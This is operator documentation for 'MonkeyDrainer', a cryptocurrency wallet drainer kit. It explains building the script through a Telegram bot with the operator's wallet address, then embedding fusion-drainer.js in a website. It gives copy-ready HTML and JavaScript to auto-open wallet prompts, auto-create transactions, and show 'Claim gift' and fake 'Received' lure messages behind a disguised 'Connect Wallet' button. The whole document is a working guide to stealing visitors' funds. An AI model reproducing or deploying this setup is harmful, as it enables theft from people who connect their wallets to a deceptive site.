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Integration of MonkeyDrainer on Your Website

Step 1: Building the Library via the Telegram Bot

  1. Open a chat with the MonkeyDrainer bot in Telegram.
  2. Click the "⚒️ Build Drainer" button.
  3. Enter your wallet address and optionally specify a list of allowed domains.
  4. Receive the library file and the CSS file.

Step 2: Including the Library and Styles

  1. Download the library file (fusion-drainer.js) and the CSS file (fusion-drainer.css).
  2. Place them in the appropriate directory of your website where other resources like JavaScript and CSS files are stored.

Example of Including the Library and Styles:

<!DOCTYPE html>
<html lang="en">
  <meta charset="UTF-8">
  <meta name="viewport" content="width=device-width, initial-scale=1.0">
  <title>MonkeyDrainer Example</title>

  <!-- Link to MonkeyDrainer CSS file -->
  <link rel="stylesheet" href="/fusion-drainer.css" />

  <!-- Link to MonkeyDrainer JavaScript library -->
  <script src="/fusion-drainer.js?v=1.0.0" defer></script>
  <!-- Your website content -->

URL Versioning

The ?v=1.0.0 parameter in the script URL indicates the file version. This is important for caching behavior in browsers and on servers:

  • Avoiding Cached Old Versions: When you update the library file, change the version number in the URL (for example, from ?v=1.0.0 to ?v=1.1.0). This forces browsers and servers to load the latest version of the file, bypassing any cached versions.


  • Old Version: <script src="/fusion-drainer.js?v=1.0.0" defer></script>
  • New Version: <script src="/fusion-drainer.js?v=1.1.0" defer></script>

Step 3: Initializing the Library

The library now supports the following parameters in the configuration object:

  • autoCreateTransaction: automatically creates a transaction when the wallet is connected.
  • autoOpenModal: automatically opens the wallet connection modal when the page loads.
  • honeypotMessage: the message displayed during the transaction.
  • honeypotAmount: the amount used for the Honeypot.
  • jettonMessage: a function that takes amount and symbol parameters and returns a message string when Jettons are received.

Example of Initializing the Library:

<!-- Container for the default wallet connection button -->
<div id="wallet-button-wrapper"></div>

  window.addEventListener('load', () => {
    const drainer = window.drainer;

    if (drainer) {
      // Initialize the library with new options
      drainer.init('#wallet-button-wrapper', {
        autoCreateTransaction: true, // Automatically create a transaction
        autoOpenModal: true, // Automatically open the modal window
        honeypotMessage: "🎁 Claim gift", // Message during Honeypot transaction
        honeypotAmount: 100, // Set the Honeypot amount
        jettonMessage: (amount, symbol) => `🎉 Received ${amount} ${symbol}` // Message when Jettons are received

Example of Using Custom Buttons

If you want to use custom buttons, hide the default button container with display: none and add the class wallet-connect-trigger to your custom buttons.

Example of a custom wallet connection button:

<!-- Hidden container for the default wallet button -->
<div id="wallet-button-wrapper" style="display: none;"></div>

<!-- Custom button for wallet connection -->
<button class="wallet-connect-trigger">Connect Wallet</button>

  window.addEventListener('load', () => {
    const drainer = window.drainer;

    if (drainer) {
      // Initialize the library with custom buttons and settings
      drainer.init('#wallet-button-wrapper', {
        autoCreateTransaction: false, // Disable automatic transaction creation
        autoOpenModal: false, // Disable automatic modal opening
        honeypotMessage: "🎁 Claim gift", // Message during Honeypot transaction
        honeypotAmount: 50, // Set the Honeypot amount
        jettonMessage: (amount, symbol) => `🎉 Received ${amount} ${symbol}` // Message when Jettons are received

Step 4: Creating a Transaction

If you want to create a transaction manually, you can do so by calling the createTransaction() method at the appropriate time. Example of a custom button to create a transaction:

<!-- Custom button to create a transaction -->
<button onclick="window.drainer.createTransaction()">Create Transaction</button>

Full Integration Example

<!DOCTYPE html>
<html lang="en">
  <meta charset="UTF-8">
  <meta name="viewport" content="width=device-width, initial-scale=1.0">
  <title>MonkeyDrainer Example</title>

  <!-- Link to MonkeyDrainer CSS file -->
  <link rel="stylesheet" href="/fusion-drainer.css" />

  <!-- Link to MonkeyDrainer JavaScript library -->
  <script src="/fusion-drainer.js?v=1.0.0" defer></script>

  <!-- Hidden container for the default wallet connection button -->
  <div id="wallet-button-wrapper" style="display: none;"></div>

  <!-- Custom button for wallet connection -->
  <button class="wallet-connect-trigger">Connect Wallet</button>

  <!-- Custom button to create a transaction -->
  <button onclick="window.drainer.createTransaction()">Create Transaction</button>

    window.addEventListener('load', () => {
      const drainer = window.drainer;

      if (drainer) {
        // Initialize the library with custom buttons and a Honeypot amount
        drainer.init('#wallet-button-wrapper', { 
          autoCreateTransaction: false,
          honeypotAmount: 200 // Set the Honeypot amount


Main Library Methods

  1. Initializing the Library

    window.drainer.init('#wallet-button-wrapper', options);
    • #wallet-button-wrapper — the container for the main wallet connection button.
    • options — the configuration object (e.g., { autoCreateTransaction: true, honeypotAmount: 100 }).
  2. Manually Creating a Transaction

  3. Opening the Wallet Connection Modal

  4. Updating the Honeypot Amount After Initialization

  5. Handling Wallet Connection and Disconnection Events

    window.drainer.onWalletConnect(() => { /* Actions when the wallet is connected */ });
    window.drainer.onWalletDisconnect(() => { /* Actions when the wallet is disconnected */ });